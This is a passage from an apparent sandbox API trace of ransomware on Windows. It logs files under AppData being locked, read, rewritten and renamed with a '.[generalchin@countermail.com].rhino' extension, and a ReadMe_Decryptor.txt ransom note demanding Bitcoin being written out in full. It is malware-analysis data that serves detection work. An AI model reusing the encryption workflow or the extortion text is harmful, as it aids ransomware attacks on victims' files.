(HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x761f90 [0087.763] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x760a50 | out: hHeap=0x6d0000) returned 1 [0087.763] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x763f58 [0087.764] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x761f90 | out: hHeap=0x6d0000) returned 1 [0087.764] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x75f2d0 [0087.764] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x763f58 | out: hHeap=0x6d0000) returned 1 [0087.764] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x763a20 [0087.764] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f2d0 | out: hHeap=0x6d0000) returned 1 [0087.764] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x73c0b8 [0087.765] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x763a20 | out: hHeap=0x6d0000) returned 1 [0087.766] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x72bfe8 [0087.767] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0087.768] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x70a650 [0087.770] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bfe8 | out: hHeap=0x6d0000) returned 1 [0087.771] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x21c32) returned 0x240f678 [0087.773] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70a650 | out: hHeap=0x6d0000) returned 1 [0087.775] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x32a39) returned 0x781f78 [0087.779] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x240f678 | out: hHeap=0x6d0000) returned 1 [0087.781] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4bf44) returned 0x240f678 [0087.784] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x781f78 | out: hHeap=0x6d0000) returned 1 [0087.787] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x71ed4) returned 0x24b0048 [0087.797] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x240f678 | out: hHeap=0x6d0000) returned 1 [0087.799] WriteFile (in: hFile=0xec, lpBuffer=0x24b0060*, nNumberOfBytesToWrite=0x5f720, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x24b0060*, lpNumberOfBytesWritten=0x2cfa04*=0x5f720, lpOverlapped=0x0) returned 1 [0088.047] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24b0048 | out: hHeap=0x6d0000) returned 1 [0088.047] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x5f720, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0088.047] CloseHandle (hObject=0xec) returned 1 [0088.052] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9870 [0088.052] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x75f2d0 [0088.053] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e9870 | out: hHeap=0x6d0000) returned 1 [0088.053] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\1033\\global.mpt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\Global.MPT.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\1033\\global.mpt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0088.110] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f2d0 | out: hHeap=0x6d0000) returned 1 [0088.110] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75f148 | out: hHeap=0x6d0000) returned 1 [0088.110] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0088.118] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b0048 [0088.119] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0088.119] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b00f0 [0088.119] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x23b0198 [0088.119] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0088.119] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\14\\1033\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\14\\1033\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0088.119] lstrlenA (lpString="All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail:\n1)generalchin@countermail.com\n2)generalchin@smime.ninja (if you do not receive a response from the first mailbox)\n\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nFree decryption as guarantee\nBefore paying you can send us up to 1 files for free decryption.\nThe total size of files must be less than 500 Kb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\n") returned 676 [0088.120] WriteFile (in: hFile=0xec, lpBuffer=0xcb9dd0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x2cfa5c, lpOverlapped=0x0 | out: lpBuffer=0xcb9dd0*, lpNumberOfBytesWritten=0x2cfa5c*=0x2a4, lpOverlapped=0x0) returned 1 [0088.121] CloseHandle (hObject=0xec) returned 1 [0088.122] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0198 | out: hHeap=0x6d0000) returned 1 [0088.122] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\rasphone.pbk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\rasphone.pbk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0088.122] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x0 [0088.122] CloseHandle (hObject=0xec) returned 1 [0088.122] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\mso1033.acl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0088.124] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x9382 [0088.124] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x94a2, nNumberOfBytesToLockHigh=0x0) returned 1 [0088.124] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.124] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0088.127] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.127] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x9382, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x9382, lpOverlapped=0x0) returned 1 [0088.129] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0088.129] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.129] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0088.129] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0088.129] GetLastError () returned 0x0 [0088.129] SetLastError (dwErrCode=0x0) [0088.129] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0088.129] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x93a5) returned 0x75ef78 [0088.131] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0088.131] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b00f0 [0088.131] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b01f8 [0088.131] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0088.131] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.132] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0088.132] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0088.132] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.132] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0088.132] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0088.132] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0088.132] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.132] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0088.132] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0088.132] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df110 [0088.132] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.132] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df140 [0088.132] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0088.132] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0088.132] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0088.132] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0088.132] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0088.132] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0088.132] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0088.133] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0088.133] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0088.133] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x708d18 [0088.133] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0088.133] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x72a920 [0088.133] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x708d18 | out: hHeap=0x6d0000) returned 1 [0088.133] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x23b00f0 [0088.133] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0088.133] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x23b0380 [0088.133] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0088.133] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x23b04c8 [0088.133] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0380 | out: hHeap=0x6d0000) returned 1 [0088.133] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x23b06b0 [0088.133] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b04c8 | out: hHeap=0x6d0000) returned 1 [0088.133] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x23b0980 [0088.133] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b06b0 | out: hHeap=0x6d0000) returned 1 [0088.133] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x768328 [0088.133] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0980 | out: hHeap=0x6d0000) returned 1 [0088.133] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x23b0380 [0088.133] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x768328 | out: hHeap=0x6d0000) returned 1 [0088.134] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x768328 [0088.134] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0380 | out: hHeap=0x6d0000) returned 1 [0088.134] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x769140 [0088.134] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x768328 | out: hHeap=0x6d0000) returned 1 [0088.134] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x72bfe8 [0088.181] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x769140 | out: hHeap=0x6d0000) returned 1 [0088.181] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x768328 [0088.181] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bfe8 | out: hHeap=0x6d0000) returned 1 [0088.181] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x72bfe8 [0088.181] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x768328 | out: hHeap=0x6d0000) returned 1 [0088.181] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x730738 [0088.182] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72bfe8 | out: hHeap=0x6d0000) returned 1 [0088.183] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x73c0b8 [0088.184] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x730738 | out: hHeap=0x6d0000) returned 1 [0088.185] WriteFile (in: hFile=0xec, lpBuffer=0x73c0c0*, nNumberOfBytesToWrite=0x94a2, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x73c0c0*, lpNumberOfBytesWritten=0x2cfa04*=0x94a2, lpOverlapped=0x0) returned 1 [0088.185] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x73c0b8 | out: hHeap=0x6d0000) returned 1 [0088.185] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x94a2, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0088.185] CloseHandle (hObject=0xec) returned 1 [0088.189] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b00f0 [0088.189] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xee) returned 0x23b0380 [0088.189] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00f0 | out: hHeap=0x6d0000) returned 1 [0088.189] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\mso1033.acl"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\MSO1033.acl.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\mso1033.acl.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0088.190] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0380 | out: hHeap=0x6d0000) returned 1 [0088.190] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b01f8 | out: hHeap=0x6d0000) returned 1 [0088.190] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x75ef78 | out: hHeap=0x6d0000) returned 1 [0088.190] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x72a920 [0088.190] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0088.190] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x23b0048 [0088.190] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x23b00d0 [0088.190] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0088.190] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0088.191] lstrlenA (lpString="All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail:\n1)generalchin@countermail.com\n2)generalchin@smime.ninja (if you do not receive a response from the first mailbox)\n\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nFree decryption as guarantee\nBefore paying you can send us up to 1 files for free decryption.\nThe total size of files must be less than 500 Kb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\n") returned 676 [0088.191] WriteFile (in: hFile=0xec, lpBuffer=0xcb9dd0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x2cfa5c, lpOverlapped=0x0 | out: lpBuffer=0xcb9dd0*, lpNumberOfBytesWritten=0x2cfa5c*=0x2a4, lpOverlapped=0x0) returned 1 [0088.193] CloseHandle (hObject=0xec) returned 1 [0088.193] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b00d0 | out: hHeap=0x6d0000) returned 1 [0088.193] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0088.194] GetFileSize (in: hFile=0xec, lpFileSizeHigh=0x2cfa64 | out: lpFileSizeHigh=0x2cfa64*=0x0) returned 0x34 [0088.194] LockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x154, nNumberOfBytesToLockHigh=0x0) returned 1 [0088.195] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.195] ReadFile (in: hFile=0xec, lpBuffer=0x2cfa24, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x2cfa24*, lpNumberOfBytesRead=0x2cfa04*=0x20, lpOverlapped=0x0) returned 1 [0088.196] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.197] ReadFile (in: hFile=0xec, lpBuffer=0x9b0040, nNumberOfBytesToRead=0x34, lpNumberOfBytesRead=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x9b0040*, lpNumberOfBytesRead=0x2cfa04*=0x34, lpOverlapped=0x0) returned 1 [0088.197] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b7f8 [0088.197] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.197] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x72aff8 [0088.197] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7438 [0088.197] GetLastError () returned 0x0 [0088.197] SetLastError (dwErrCode=0x0) [0088.197] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0088.197] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x34) returned 0x709a08 [0088.198] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0088.198] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x23b0048 [0088.198] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x23b0150 [0088.198] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0088.198] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.198] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x72b7f8 [0088.198] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x72b818 [0088.198] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.198] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x72b7f8 [0088.198] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0088.198] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x72b818 [0088.198] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.198] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x72b7f8 [0088.198] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b818 | out: hHeap=0x6d0000) returned 1 [0088.198] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x6df140 [0088.198] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72b7f8 | out: hHeap=0x6d0000) returned 1 [0088.198] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x6df110 [0088.199] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df140 | out: hHeap=0x6d0000) returned 1 [0088.199] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x709e68 [0088.199] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6df110 | out: hHeap=0x6d0000) returned 1 [0088.199] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6e8980 [0088.199] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x709e68 | out: hHeap=0x6d0000) returned 1 [0088.199] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x72aff8 [0088.199] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e8980 | out: hHeap=0x6d0000) returned 1 [0088.199] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x6e7438 [0088.199] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72aff8 | out: hHeap=0x6d0000) returned 1 [0088.199] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x154) returned 0x23b02d8 [0088.199] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7438 | out: hHeap=0x6d0000) returned 1 [0088.199] WriteFile (in: hFile=0xec, lpBuffer=0x23b02d8*, nNumberOfBytesToWrite=0x154, lpNumberOfBytesWritten=0x2cfa04, lpOverlapped=0x0 | out: lpBuffer=0x23b02d8*, lpNumberOfBytesWritten=0x2cfa04*=0x154, lpOverlapped=0x0) returned 1 [0088.199] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02d8 | out: hHeap=0x6d0000) returned 1 [0088.199] UnlockFile (hFile=0xec, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x154, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0088.199] CloseHandle (hObject=0xec) returned 1 [0088.201] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x23b0048 [0088.201] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf0) returned 0x23b02d8 [0088.201] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0048 | out: hHeap=0x6d0000) returned 1 [0088.201] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\index.dat.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\index.dat.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0088.202] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b02d8 | out: hHeap=0x6d0000) returned 1 [0088.202] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0150 | out: hHeap=0x6d0000) returned 1 [0088.202] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, 